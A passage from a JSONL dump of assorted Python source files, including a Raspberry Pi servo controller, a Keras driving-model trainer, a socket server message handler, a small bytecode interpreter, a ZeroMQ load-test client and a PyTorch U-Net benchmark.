(int(x) == 1):\n# print \"\\n\"\n# print 'correct'\n# print x\n# else:\n# print \"\\n\"\n# print 'wrong'\n# print x\n\n\n\n#\t\t\ttime.sleep(1)\n\n\n\n\nPIN=24\nQIN=23\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(PIN,GPIO.OUT)\nGPIO.setup(QIN,GPIO.OUT)\np=GPIO.PWM(PIN,50)\nq=GPIO.PWM(QIN,50)\np.start(5)\nq.start(5)\ntime.sleep(1)\nrow = 5\ncol = 5\nval = 0.1\n\ndef direction(key):\n\tglobal row\n\tglobal col\n\tif x == \"w\" and row > 2:\n\t\trow -= val\n\telif x == \"s\" and row < 9:\n\t\trow += val\n\telif x == \"n\":\n\t\trow = 5\n\t\tcol = 5\n\telif x == \"a\" and col < 9:\n\t\tcol += val\n\telif x == \"d\" and col > 2:\n\t\tcol -= val\n\telif x == \"z\":\n\t\tprint(\"DONE.\")\n\t\texit()\n\tp.start(row)\n\tq.start(col)\n\n\ntry:\n\n\n\twhile True:\n\t\tgetch = _Getch()\n\t\tx = getch()\n\t\tdirection(x)\n\nexcept KeyboardInterrupt:\n\tp = GPIO.PWM(PIN,50)\n\tq = GPIO.PWM(QIN,50)\n\tp.start(5)\n\tq.start(5)\n\ttime.sleep(1)\n\tGPIO.cleanup()\n","sub_path":"raw_input2.py","file_name":"raw_input2.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"360409353","text":"# -*- encoding:utf-8 -*-\n\n\nimport csv\nimport cv2\nimport numpy as np\nimport random\n\n\ndef main():\n lines = []\n with open(\"driving_log.csv\") as dl_csv:\n reader = csv.reader(dl_csv)\n for line in reader:\n lines.append(line)\n\n #loading data and preprocessing\n images = []\n measurements = []\n correction = 0.2\n random.shuffle(lines)\n for line in lines:\n if random.random() > 1:\n continue\n source_path = line[0]\n filename = source_path.split(\"/\")[-1]\n current_path = \"IMG/\" + filename\n image = cv2.imread(current_path)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n images.append(image)\n measurement = float(line[3])\n measurements.append(measurement)\n\n image_left = cv2.imread(\"IMG/\" + line[1].split(\"/\")[-1])\n image_left = cv2.cvtColor(image_left, cv2.COLOR_BGR2GRAY)\n measurement_left = float(line[3]) + correction\n images.append(image_left)\n measurements.append(measurement_left)\n\n image_right = cv2.imread(\"IMG/\" + line[2].split(\"/\")[-1])\n image_right = cv2.cvtColor(image_right, cv2.COLOR_BGR2GRAY)\n measurement_right = float(line[3]) - correction\n images.append(image_right)\n measurements.append(measurement_right)\n\n augmented_images, augmented_measurements = [], []\n for image, measurement in zip(images, measurements):\n augmented_images.append(image)\n augmented_measurements.append(measurement)\n augmented_images.append(cv2.flip(image, 1))\n augmented_measurements.append(measurement * -1.0)\n\n X_train = np.array(augmented_images)\n X_train = np.resize(X_train, (len(augmented_images), 160, 320, 1))\n y_train = np.array(augmented_measurements)\n\n from keras.models import Sequential\n from keras.layers import Flatten, Dense, Lambda, Cropping2D, Dropout, Activation\n from keras.layers.convolutional import Convolution2D\n from keras.layers.pooling import MaxPooling2D, AveragePooling2D\n from keras.layers.normalization import BatchNormalization\n from keras.optimizers import Adam\n\n #model structure\n model = Sequential()\n model.add(Lambda(lambda x: (x / 255.0) - 0.5, input_shape=(160, 320, 1)))\n model.add(Cropping2D(cropping=((65, 25), (0, 0))))\n\n model.add(Convolution2D(18, 5, 5, subsample=(4, 4)))\n model.add(BatchNormalization())\n model.add(Activation(\"relu\"))\n model.add(Dropout(0.2))\n\n model.add(Convolution2D(24, 5, 5, subsample=(2, 2)))\n model.add(BatchNormalization())\n model.add(Activation(\"relu\"))\n model.add(Dropout(0.2))\n\n model.add(Convolution2D(48, 3, 3, subsample=(2, 1)))\n model.add(BatchNormalization())\n model.add(Activation(\"relu\"))\n model.add(Dropout(0.2))\n\n model.add(Convolution2D(64, 3, 3))\n model.add(BatchNormalization())\n model.add(Activation(\"relu\"))\n model.add(Dropout(0.2))\n\n model.add(Flatten())\n model.add(Dense(128))\n model.add(Dense(32))\n model.add(Dense(16))\n model.add(Dense(1))\n\n #training process\n adam = Adam(lr=0.0008)\n model.compile(loss=\"mse\", optimizer=adam)\n history = model.fit(\n X_train, y_train, batch_size=32, validation_split=0.05,\n shuffle=True, nb_epoch=20)\n\n #save the model\n model.save(\"model.h5\")\n import pickle\n pickle.dump(history.history, open(\"history.pickle\", \"wb\"))\n\n model.summary()\n model.get_config()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"92905231","text":"import re\n\nf = open('britain-text.txt','r')\ntext = f.read()\nf.close()\ntmp_dic = {}\n\nr = re.compile(r'\\{\\{基礎情報(.+)\\n\\}\\}\\n', re.MULTILINE | re.S)\ntmp_list = r.search(text).group(1).split('\\n|')\n\nr = re.compile(r'(.+)=(.+)', re.MULTILINE | re.S)\n\n# 処理するための正規表現\ninternal_link = re.compile(r'\\[{1,2}(.+)\\]{1,2}')\nfor tmp in tmp_list:\n m = r.match(tmp)\n if m:\n # m.group(2)を処理していく\n field = re.sub(r'\\'{2,5}','',m.group(2))\n tmp_dic[m.group(1).replace(' ','')] = field\n\nfor i, v in tmp_dic.items():\n print(i+':'+v)\n","sub_path":"chapter3/26.py","file_name":"26.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"108710666","text":"# For loops with a list:\r\n# fruits = [\"Apple\", \"Banana\", \"Mango\", \"Papaya\"]\r\n# for fruit in fruits:\r\n# print(fruit)\r\n# print(f\"{fruit} Pie\")\r\n\r\n# For loops with range: default increase is one\r\n# for number in range(1, 10):\r\n# print(number)\r\n\r\n\r\n# For loops with range: default increase is number provided third argument\r\n# for number in range(1, 10, 2):\r\n# print(number)\r\n\r\n# adding numbers using for loop:\r\n# total_sum = 0\r\n# for number in range(1, 101):\r\n# total_sum += number\r\n# print(f\"Sum is : {total_sum}\")\r\n\r\n# Sum of all the even numbers from 1 - 100:\r\neven_sum = 0\r\nfor num in range(1, 101):\r\n if num % 2 == 0:\r\n even_sum += num\r\nprint(f\"Sum of all even numbers is : {even_sum}\")\r\n","sub_path":"fruitLoop/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"493182865","text":"\"\"\"服务端的消息对象\n\"\"\"\n\nimport sys\nimport selectors\nimport json\nimport io\nimport struct\nimport logging\n\nfrom datas_src.apis import API\n\nlogger = logging.getLogger(\"libserver\")\n\n\nrequest_search = {\n \"morpheus\": \"Follow the white rabbit. \\U0001f430\",\n \"ring\": \"In the caves beneath the Misty Mountains. \\U0001f48d\",\n \"\\U0001f436\": \"\\U0001f43e Playing ball! \\U0001f3d0\",\n}\n\n\nclass Message:\n def __init__(self, selector, sock, addr):\n self.selector = selector # 轮训管理对象\n self.sock = sock\n self.addr = addr\n self._recv_buffer = b\"\" # 接收缓存区\n self._send_buffer = b\"\" # 发送缓存区\n self._jsonheader_len = None # 存储头部长度\n self.jsonheader = None # 存储请求头\n self.request = None # 存储具体的请求内容\n self.response_created = False # 响应消息是否创建\n\n def _set_selector_events_mask(self, mode):\n \"\"\"Set selector to listen for events: mode is 'r', 'w', or 'rw'.\n \"\"\"\n if mode == \"r\":\n events = selectors.EVENT_READ\n elif mode == \"w\":\n events = selectors.EVENT_WRITE\n elif mode == \"rw\":\n events = selectors.EVENT_READ | selectors.EVENT_WRITE\n else:\n raise ValueError(f\"Invalid events mask mode {repr(mode)}.\")\n self.selector.modify(self.sock, events, data=self)\n\n def _read(self):\n \"\"\"调用 socket 的 recv 读取\n 分块读取 直到全部读取完成\n \"\"\"\n try:\n # Should be ready to read\n data = self.sock.recv(4096)\n except BlockingIOError:\n # Resource temporarily unavailable (errno EWOULDBLOCK)\n pass\n else:\n if data:\n self._recv_buffer += data\n else:\n raise RuntimeError(\"Peer closed.\")\n\n def _write(self):\n \"\"\"调用 socket 的 send 进行写入\n \"\"\"\n if self._send_buffer:\n print(\"sending\", repr(self._send_buffer), \"to\", self.addr)\n try:\n # Should be ready to write\n sent = self.sock.send(self._send_buffer)\n except BlockingIOError:\n # Resource temporarily unavailable (errno EWOULDBLOCK)\n pass\n else:\n self._send_buffer = self._send_buffer[sent:]\n # Close when the buffer is drained. The response has been sent.\n if sent and not self._send_buffer:\n\n # logger.debug(f'写入完成当前的 socket {self.addr} 关闭')\n # self.close()\n pass\n\n def _json_encode(self, obj, encoding):\n \"\"\"对返回内容进行编码\n \"\"\"\n return json.dumps(obj, ensure_ascii=False).encode(encoding)\n\n def _json_decode(self, json_bytes, encoding):\n \"\"\"接收的是文本或者 json 数据的时候 将数据解码\n \"\"\"\n tiow = io.TextIOWrapper(\n io.BytesIO(json_bytes), encoding=encoding, newline=\"\"\n )\n obj = json.load(tiow)\n tiow.close()\n return obj\n\n def _create_message(self, *, content_bytes, content_type, content_encoding):\n \"\"\"封装响应为一条 message\n \"\"\"\n jsonheader = {\n \"byteorder\": sys.byteorder,\n \"content-type\": content_type,\n \"content-encoding\": content_encoding,\n \"content-length\": len(content_bytes),\n }\n jsonheader_bytes = self._json_encode(jsonheader, \"utf-8\")\n message_hdr = struct.pack(\">H\", len(jsonheader_bytes))\n message = message_hdr + jsonheader_bytes + content_bytes\n return message\n\n def _create_response_json_content(self):\n \"\"\"创建 text / json 类型的响应\n \"\"\"\n # logger.debug(\"创建响应 ~~~\")\n type = self.request.get(\"type\")\n instance = API()\n answer = f'Error: invalid request {self.request}'\n\n if type == \"get\": # 查询请求\n method = self.request.get(\"method\")\n if method == \"select_topics\":\n exchangeno = self.request.get(\"exchangeno\")\n commoditytype = self.request.get(\"commoditytype\")\n commodityno = self.request.get(\"commodityno\")\n contractno = self.request.get(\"contractno\")\n begin = self.request.get(\"begin\")\n end = self.request.get(\"end\")\n try:\n logger.info(f\"select request: {exchangeno, commoditytype, commodityno, contractno, begin, end}\")\n ret = instance.select(exchangeno, commoditytype, commodityno, contractno, begin, end)\n answer = [json.loads(r) for r in ret]\n except Exception as e:\n answer = f\"select_topics 失败 原因是: {e}\"\n elif method == \"active_topics\":\n answer = instance.get_active_topic\n elif method == \"exists_topics\":\n answer = instance.get_exists_topic\n\n content = {\"result\": answer}\n content_encoding = \"utf-8\"\n response = {\n \"content_bytes\": self._json_encode(content, content_encoding),\n \"content_type\": \"text/json\",\n \"content_encoding\": content_encoding,\n }\n return response\n\n def _create_response_binary_content(self):\n \"\"\"创建二进制类型的响应\n \"\"\"\n response = {\n \"content_bytes\": b\"First 10 bytes of request: \"\n + self.request[:10],\n \"content_type\": \"binary/custom-server-binary-type\",\n \"content_encoding\": \"binary\",\n }\n return response\n\n def process_events(self, mask):\n \"\"\" 服务端消息的入口:\n 服务端根据 mask 对\"读\"或者是\"写\"事件的分配处理\n \"\"\"\n if mask & selectors.EVENT_READ:\n self.read()\n if mask & selectors.EVENT_WRITE:\n self.write()\n\n def read(self):\n \"\"\"读取消息 分别设置状态\n \"\"\"\n self._read()\n\n if self._jsonheader_len is None:\n self.process_protoheader()\n\n if self._jsonheader_len is not None:\n if self.jsonheader is None:\n self.process_jsonheader()\n\n if self.jsonheader:\n if self.request is None:\n self.process_request()\n\n def write(self):\n \"\"\"服务端写入就绪\n \"\"\"\n if self.request is not None: # 说明已经读取完成了请求\n if not self.response_created:\n self.create_response()\n self._write()\n\n def close(self):\n \"\"\"关闭连接\n \"\"\"\n print(\"closing connection to\", self.addr)\n try:\n self.selector.unregister(self.sock)\n except Exception as e:\n print(\n f\"error: selector.unregister() exception for\",\n f\"{self.addr}: {repr(e)}\",\n )\n\n try:\n self.sock.close()\n except OSError as e:\n print(\n f\"error: socket.close() exception for\",\n f\"{self.addr}: {repr(e)}\",\n )\n finally:\n # Delete reference to socket object for garbage collection\n self.sock = None\n\n def process_protoheader(self):\n \"\"\"读取出头部消息的长度\n \"\"\"\n hdrlen = 2\n # 只要读取的长度大于两个 就可以解析头两个字节去获取到头部的长度了\n if len(self._recv_buffer) >= hdrlen:\n self._jsonheader_len = struct.unpack(\n \">H\", self._recv_buffer[:hdrlen]\n )[0]\n self._recv_buffer = self._recv_buffer[hdrlen:]\n\n def process_jsonheader(self):\n \"\"\"在有了头部消息的长度之后 就可以读出头部消息\n \"\"\"\n hdrlen = self._jsonheader_len\n if len(self._recv_buffer) >= hdrlen:\n self.jsonheader = self._json_decode(\n self._recv_buffer[:hdrlen], \"utf-8\"\n )\n self._recv_buffer = self._recv_buffer[hdrlen:]\n for reqhdr in (\n \"byteorder\",\n \"content-length\",\n \"content-type\",\n \"content-encoding\",\n ):\n if reqhdr not in self.jsonheader:\n raise ValueError(f'Missing required header \"{reqhdr}\".')\n\n def process_request(self):\n \"\"\"解析头部消息 获取具体的请求体\n \"\"\"\n content_len = self.jsonheader[\"content-length\"]\n # 还没有读取够足够长度的消息\n if not len(self._recv_buffer) >= content_len:\n return\n logger.debug(f\"data: \")\n data = self._recv_buffer[:content_len]\n logger.debug(f\"data: {data}\")\n # 重置接收缓存区\n self._recv_buffer = self._recv_buffer[content_len:]\n # 判断接收数据的类型\n if self.jsonheader[\"content-type\"] == \"text/json\":\n encoding = self.jsonheader[\"content-encoding\"]\n self.request = self._json_decode(data, encoding)\n logger.info(f\"received request {self.request} from {self.addr}\")\n else:\n # Binary or unknown content-type\n self.request = data\n logger.info(f'received {self.jsonheader[\"content-type\"]} request from {self.addr}')\n # Set selector to listen for write events, we're done reading.\n # 读完之后 重置事件管理器的监听类型\n self._set_selector_events_mask(\"w\")\n\n def create_response(self):\n \"\"\"根据请求类型(json 或者二进制) 创建响应、封装为 message 放入发送缓存区\n \"\"\"\n if self.jsonheader[\"content-type\"] == \"text/json\":\n response = self._create_response_json_content()\n else:\n # Binary or unknown content-type\n response = self._create_response_binary_content()\n logger.debug(f\"创建回复消息: {response}\")\n message = self._create_message(**response)\n self.response_created = True\n self._send_buffer += message\n","sub_path":"libserver.py","file_name":"libserver.py","file_ext":"py","file_size_in_byte":10187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"474188898","text":"from flask import Flask\nfrom apscheduler.schedulers.background import BackgroundScheduler\nfrom lib.DataStorage import DataStorage\nfrom lib.StatUtils import StatUtils\nimport docker\nimport logging\n\napp = Flask('docker-stats-to-influx')\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\ndef store_docker_stats():\n client = docker.from_env()\n for con in client.containers.list():\n stats = con.stats(stream=False)\n container_name = stats[\"name\"]\n DataStorage.put(container_name, StatUtils.get_stat_values(stats))\n client.close()\n\nif __name__ == \"__main__\":\n sched = BackgroundScheduler(daemon=True)\n sched.add_job(store_docker_stats, 'interval', seconds=5)\n sched.start()\n app.run(host='0.0.0.0', port=5556, debug=True, threaded=True)\n\n\n\n","sub_path":"App.py","file_name":"App.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"528069598","text":"class Solution:\n def findTheWinner(self, n: int, k: int) -> int:\n q = [i for i in range(n, 0, -1)]\n while len(q) > 1:\n for i in range(k - 1):\n q.insert(0, q.pop())\n q.pop()\n\n return q[0]\n\n def findTheWinner2(self, n: int, k: int) -> int:\n ans = 0\n for i in range(1, n + 1):\n ans = (ans + k) % i\n return ans + 1\n\n\nif __name__ == '__main__':\n s = Solution()\n print(s.findTheWinner(5, 2))\n print(s.findTheWinner2(5, 2))\n","sub_path":"leetcode/medium/find-the-winner-of-the-circular-game.py","file_name":"find-the-winner-of-the-circular-game.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"162343581","text":"# -*- config: utf-8 -*- \nEVAL_VER = 'v0.10 20.07.09'\nimport copy\nfrom fractions import Fraction\nfrom hedder import *\n\n#STOP, LDC, LD, INC, DEC, ADD, SUB, MUL, DIV, MOD, IDIV, POW, EQ, NEQ,\\\n#GT, LT ,GEQ, LEQ, SET, CALL, TCALL, RTN, SEL, TSEL, JOIN, VEC, VSET, \\\n#REF, DICT, TSET, APL, TAPL, LDF, LDICT, LDM, LDM_CL = range(36)\n\n#INST_CODE = [\n# 'STOP','LDC','LD','INC','DEC','ADD','SUB','MUL','DIV','MOD','IDIV','POW','EQ','NEQ'\n# 'GT','LT','GEQ','LEQ','SET','CALL','TCALL','RTN','SEL','TSEL','JOIN','VEC','VSET',\n# 'REF','DICT','TSEL','APL','TAPL','LDF','LDICT','LDM','LDM_CL',\n# ]\n\ndef eval(S, E, C, cp, R, EE, G):\n #print(S, E,C , cp, R, EE)\n while True:\n inst = C[cp]\n #print('S:', S)\n #print('C:', C[cp:])i\n #print(E)\n #if not ('z' in E[0]):\n #print(inst)\n if inst == 'STOP':\n #print(S, R)\n #return S[ - 1]\n #return S.pop()\n return S\n cp += 1\n if inst == 'LDC':\n #\n if C[cp] == []:S.append([])\n else:S.append(C[cp])\n cp += 1\n elif inst == 'LD' : # ,LD (n,m) \n n, m = C[cp]\n #print(n,m)\n cp +=1\n if m<0:S.append(E[n][-m-1:])\n else:S.append(E[n][m])\n #elif inst == 'LD-' : # ,LD (n,m) m<0の場合を別命令にした\n # n, m = C[cp]\n # #print(n,m)\n # cp +=1\n # S.append(E[n][-m+1:])\n elif inst == 'LDG': # ,LDG val,\n val = C[cp]\n if val in G:\n S.append(G[val])\n #print(\"key=\",val, \" val=\",G[val])\n #C=C[:]\n #C[cp-1]='LDC'\n #C[cp]=G[val]\n #print(\"change_code:\",C[cp-1],C[cp])\n cp+=1\n else: raise KeyError('name '+val+' is not defined')\n elif inst == 'INC':\n S[ - 1] += 1\n elif inst == 'DEC':\n S[ - 1] -= 1\n elif inst == 'MINUS':\n S[ - 1] = - S[ - 1]\n elif inst == 'NOT':\n S[ - 1] = not S[ - 1]\n elif inst == 'ADD':\n S[ - 2] += S[ - 1]\n del(S[ - 1])\n #S.append(S.pop() + S.pop())\n elif inst == 'SUB':\n S[ - 2] -= S[ - 1]\n del(S[ - 1])\n elif inst == 'MUL':\n S[ - 2] *= S[ - 1]\n del(S[ - 1])\n elif inst == 'DIV':\n if isinstance(S[ - 2], int) and isinstance(S[ - 1], int):S[ - 2] = Fraction(S[ - 2], S[ - 1])\n else:S[ - 2] /= S[ - 1]\n del(S[ - 1])\n elif inst == 'MOD':\n S[ - 2] %= S[ - 1]\n del(S[ - 1])\n elif inst == 'IDIV':\n S[ - 2] //= S[ - 1]\n del(S[ - 1])\n elif inst == 'POW':\n S[ - 2] = S[ - 2] ** S[ - 1]\n del(S[ - 1])\n elif inst == 'EQ':\n S[ - 2] = (S[ - 2] == S[ - 1])\n del(S[ - 1])\n elif inst == 'NEQ':\n S[ - 2] = (S[ - 2] != S[ - 1])\n del(S[ - 1])\n elif inst == 'GEQ':\n S[ - 2] = S[ - 2] >= S[ - 1]\n del(S[ - 1])\n elif inst == 'LEQ':\n S[ - 2] = S[ - 2] <= S[ - 1]\n del(S[ - 1])\n elif inst == 'GT':\n S[ - 2] = S[ - 2] > S[ - 1]\n del(S[ - 1])\n elif inst == 'LT':\n S[ - 2] = S[ - 2] < S[ - 1]\n del(S[ - 1])\n elif inst == 'IS':\n S[ - 2] = S[ - 2] is S[ - 1]\n del(S[ - 1])\n elif inst == 'IN':\n S[ - 2] = S[ - 2] in S[ - 1]\n del(S[ - 1])\n elif inst == 'AND':\n S[ - 2] = S[ - 2] & S[ - 1 ]\n del(S[ - 1])\n elif inst == 'OR':\n S[ - 2] = S[ - 2] | S[ - 1 ]\n del(S[ - 1])\n elif inst == 'XOR':\n S[ - 2] = S[ - 2] ^ S[ - 1 ]\n del(S[ - 1])\n elif inst == 'SHR':\n S[ - 2] = S[ - 2] >> S[ - 1 ]\n del(S[ - 1])\n elif inst == 'SHL':\n S[ - 2] = S[ - 2] << S[ - 1 ]\n del(S[ - 1])\n elif inst == 'BNOT':\n S[ - 1] = ~S[ - 1 ]\n elif inst == 'VEC':\n n = C[cp]\n cp += 1\n v = S[ - n:]\n del(S[ - n:])\n S.append(v)\n elif inst == 'REF':\n ref = S.pop()\n t = S.pop()\n S.append(t[ref])\n elif inst == 'SLS':\n sl_s = S.pop()\n sl_e = S.pop()\n t = S.pop()\n S.append(t[sl_s:sl_e])\n elif inst == 'TCALL': \n n = C[cp]\n cp += 1\n fn = S.pop()\n l = []\n if n != 0:\n #l = copy.deepcopy(S[ - n:]) #deep copyはやりすぎ!要素1個1個のcopyが望ましい\n l = (S[ - n:]) \n del(S[ - n:])\n #for i in range(n):\n # l = [S.pop()] + l\n #if type(fn) == list and fn[0] == 'CL':\n if isinstance(fn,Userfunction):\n E = [l] + fn[2]\n C = fn[1] \n cp = 0\n #elif type(fn) == list and fn[0] == 'CONT':\n elif isinstance(fn,Continuation):\n S, E, C, R, EE = fn[1] + l, fn[2][:], fn[3], fn[4][:], fn[5][:]\n cp = 0\n elif n == 0:S.append(fn())\n elif n == 1:S.append(fn(l[0]))\n else: S.append(fn( * l))\n elif inst == 'CALL': \n n = C[cp]\n cp += 1\n fn = S.pop()\n l = []\n if n != 0:\n #l = copy.deepcopy(S[ - n:])\n l = S[ - n:]\n del(S[ - n:])\n #for i in range(n):\n # l = [S.pop()] + l\n #if type(fn) == list and fn[0] == 'CL':\n if isinstance(fn,Userfunction):\n R.append([C, cp])\n EE.append(E)\n E = [l] + fn[2]\n C = fn[1] \n cp = 0\n #elif type(fn) == list and fn[0] == 'CONT':\n elif isinstance(fn,Continuation):\n S, E, C, R, EE = fn[1] + l, fn[2][:], fn[3], fn[4][:], fn[5][:]\n #print(fn[2])\n cp = 0\n elif n == 0:S.append(fn())\n elif n == 1:S.append(fn(l[0]))\n else: S.append(fn( * l))\n elif inst == 'TAPL': \n n = C[cp]\n cp += 1\n fn, l = S[ - n ], S[ - n + 1 : - 1] + S[ - 1]\n del(S[ - n:])\n #print(fn, l)\n #if type(fn) == list and fn[0] == 'CL':\n if isinstance(fn,Userfunction):\n E = [l] + fn[2]\n C = fn[1] \n cp = 0\n #elif type(fn) == list and fn[0] == 'CONT':\n elif isinstance(fn,Continuation):\n S, E, C, R, EE = fn[1] + l, fn[2][:], fn[3], fn[4][:], fn[5][:]\n cp = 0\n elif n == 0:S.append(fn())\n elif n == 1:S.append(fn(l[0]))\n else: S.append(fn( * l))\n elif inst == 'APL': \n n = C[cp]\n cp += 1\n fn, l = S[ - n ], S[ - n + 1 : - 1] + S[ - 1]\n del(S[ - n:])\n #print(fn, l)\n #if type(fn) == list and fn[0] == 'CL':\n if isinstance(fn,Userfunction):\n R.append([C, cp])\n EE.append(E)\n E = [l] + fn[2]\n C = fn[1] \n cp = 0\n #elif type(fn) == list and fn[0] == 'CONT':\n elif isinstance(fn,Continuation):\n S, E, C, R, EE = fn[1] + l, fn[2][:], fn[3], fn[4][:], fn[5][:]\n cp = 0\n elif n == 0:S.append(fn())\n elif n == 1:S.append(fn(l[0]))\n else: S.append(fn( * l))\n elif inst == 'RTN':\n E = EE.pop()\n C, cp = R.pop()\n elif inst=='SET': # value,set (n,m)\n n, m = C[cp]\n cp += 1\n E[n][m] = S[-1]\n elif inst == 'GSET': # value, gset key \n key = C[cp]\n val = S[ - 1]\n #print( \"val = \", v)\n #print(\"key = \", k)\n cp += 1\n G[key] = val\n elif inst == 'VSET': # value, vec, ind, vset \n ind = S.pop()\n vec = S.pop()\n val = S[ - 1]\n vec[ind] = val\n elif inst == 'DCL':\n k = C[cp]\n cp += 1\n E[0][k] = None\n S.append(None)\n elif inst == 'TSEL':\n p = S.pop()\n t_exp = C[cp]\n f_exp = C[cp + 1]\n cp += 2\n #R.append([C, cp])\n cp = 0\n if p is False: C = f_exp #!!!注意!!!False以外はTrueと判断させている!!!\n else: C = t_exp\n elif inst == 'SEL':\n p = S.pop()\n t_exp = C[cp]\n f_exp = C[cp + 1]\n cp += 2\n R.append([C, cp])\n cp = 0\n if p is False: C = f_exp\n else: C = t_exp\n elif inst == 'WHILE':\n p = S.pop()\n back = C[cp]\n loop_exp = C[cp + 1]\n if p:\n R.append([C, cp - back - 1])\n #print(C[cp - back - 1])\n C = loop_exp\n cp = 0\n else:\n cp = cp + 2 \n S.append(None)\n #print(C[cp])\n elif inst == 'JOIN':\n C, cp =R.pop() \n elif inst == 'LDF':\n k = C[cp + 1]\n #print(k)\n S.append(Userfunction(['CL', C[cp], E]))\n cp +=1 \n elif inst == 'LDICT':\n S.append(Continuation(['CONT', S[:], E[:], C[cp], R[:], EE[:]]))\n cp += 1\n elif inst == 'LDM': #############################\n S.append(Macro(['MACRO', C[cp]]))\n cp += 1\n elif inst == 'LDM_CL': #############################\n S.append(Macro(['MACRO_CL', C[cp], C[cp + 1], E]))\n cp += 2\n elif inst == 'DICT':\n n = C[cp]//2\n cp += 1\n d={}\n for i in range(n):\n k=S.pop()\n if isinstance(k,list):k=tuple(k)\n v=S.pop()\n d[k] = v\n S.append(d)\n elif inst == 'POP':\n del(S[ -1])\n #elif inst == '__CODE__':\n # S.append('Continuation!')\n else:\n print(inst)\n #print(E)\n raise KeyError('Unknown Code:' + inst)\n\nimport pickle\nimport sys\n \nif __name__ == '__main__':\n args = sys.argv\n if len(argv)>1:\n f=open(argv[1])\n c,g = pickle.load(f)\n eval([],[g],c,0,[],[])\n","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":10758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"249843935","text":"# coding:utf-8\nfrom txzmq import ZmqEndpoint, ZmqREQConnection, ZmqRequestTimeoutError\nfrom twisted.internet import reactor\nimport time\nimport zmq\nfrom ZmqFactory import ZmqFactory\nimport json\n\nip = 'tcp://10.10.0.233:8880'\ns_ip = 'tcp://10.10.0.233:10000'\nzf = ZmqFactory()\ns = ZmqREQConnection(zf, ZmqEndpoint('connect', ip))\nnum = 0\nsdata = {}\nwith open('block.json', 'r') as f:\n data = f.read()\n data = json.dumps(data) \n sdata['data'] = data\n\nclass Client(object):\n def __init__(self,s,name):\n self.s = s\n self.name = name\n \n def request(self):\n def produce():\n print(\"Requesting from %s\" % (self.name))\n\n try:\n global num\n num += 1 \n print('the num of request: %d' %num)\n global sdata\n sdata['time'] = time.time()\n sdata['name'] = self.name\n print('%.6f' %sdata['time'])\n d = self.s.sendMsg(json.dumps(sdata), timeout=60*5)\n \n def doPrint(reply): # else reply -->list\n print(\"Got reply: %s\" % (reply[0])) # ???\n\n def onTimeout(fail): # except\n fail.trap(ZmqRequestTimeoutError)\n print(\"Timeout on request, is reply server running?\")\n print('switching to other worker: %s' % s_ip)\n \n self.s.shutdown()\n self.s = ZmqREQConnection(zf, ZmqEndpoint('connect', s_ip))\n d.addCallback(doPrint).addErrback(onTimeout)\n except zmq.error.Again:\n print(\"Skipping, no consumers...\")\n #reactor.callLater(20, produce)\n reactor.callWhenRunning(produce)\n\n\ndef generate_c():\n c_list = []\n for i in range(1000):\n print(i)\n global s\n s = ZmqREQConnection(zf, ZmqEndpoint('connect', ip))\n names = locals()\n name = 'client-%s' % (i+1)\n names[name] = Client(s, name)\n c_list.append(names[name])\n return c_list\n\n\ndef test():\n start = time.time()\n print('begin: ', start)\n for c in generate_c():\n #print(getattr())\n c.request()\n end = time.time()\n print('end: ', end)\n print('total time: %s' % (end-start))\n\nreactor.callWhenRunning(test)\nreactor.run()\n","sub_path":"txZMQ_test/final/test_txzmq/test_serverby.py","file_name":"test_serverby.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"187527154","text":"from typing import Any, Callable, Dict, List, Optional, Tuple, cast\nimport sys\nimport torch\nfrom torch import nn\nimport torch.nn.functional as F\nfrom torch.optim import SGD\nfrom torch.utils.data import Dataset, DataLoader\nimport time\nfrom unet import unet\nimport click\n\n# Parameters and DataLoaders\ninput_size = 5\noutput_size = 2\n\nbatch_size = 64\ndataset_size = 640\n\n######################################################################\nBASE_TIME: float = 0\nepochs = 5\nskip_epochs = 1\ntitle = 'data_parallel'\nsave_file = 'unet_data_parallel_stats.csv'\nexperiment = title\ncmd_params = sys.argv\nif len(cmd_params) < 2:\n raise ValueError(\"Expected Command Line parameter is 1, given None.\")\nparallelism = cmd_params[1]\nparallelism = 8\n######################################################################\n# Device\n#\ndef max_gpu_devices():\n devices = []\n if torch.cuda.is_available():\n devices = list(range(torch.cuda.device_count()))\n return devices\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\ndevices = []\nin_device = None\nout_device = None\n\nmax_devices = max_gpu_devices()\nif parallelism > len(max_devices):\n raise ValueError(\"Parallelism {} exceeds the maximum number of devices {}\".format(parallelism, max_devices))\nelse:\n devices = list(range(parallelism))\nin_device = devices[0]\nout_device = devices[-1]\n\n\n######################################################################\n# Dummy DataSet\n# -------------\n#\n# Make a dummy (random) dataset. You just need to implement the\n# getitem\n#\n\n\nclass RandomDataset(Dataset):\n\n def __init__(self, batch_size, dataset_size):\n input = torch.rand(3, 192, 192, device=in_device)\n target = torch.ones(1, 192, 192, device=out_device)\n data = [(input, target)] * dataset_size\n\n self.len = dataset_size\n self.data = data\n\n def __getitem__(self, index):\n return self.data[index]\n\n def __len__(self):\n return self.len\n\n\ndata = DataLoader(dataset=RandomDataset(batch_size, dataset_size),\n 